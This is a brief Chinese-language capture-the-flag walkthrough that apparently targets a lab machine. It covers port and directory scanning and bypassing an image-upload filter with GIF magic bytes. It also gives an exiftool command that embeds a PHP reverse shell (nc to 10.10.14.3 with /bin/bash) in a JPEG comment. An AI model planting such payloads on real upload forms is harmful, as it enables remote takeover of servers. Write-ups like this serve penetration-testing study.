1、nmap
进入80也看不出啥,dirbuster倒是扫出了很多,从扫出来的那几个目录很容易看出这个考上传。
2、上传
但当然上传不会让你那么easy直接传个php搞定。多半加了图片筛选之类的。其实破解方法就是php代码前面加上magic bytes.那个网站 比如要改成gif文件前加上GIF89a;
或者用工具
先找一张已存在的图片,比如666.jpg,然后执行命令 覆盖这个666.jpg。最后根据实际情况改名字。比如改成666.php.jpg
exiftool -Comment='<?php system("nc 10.10.14.3 1234 -e /bin/bash"); ?>' 666.jpg
回到做题:
把backup文件考下来看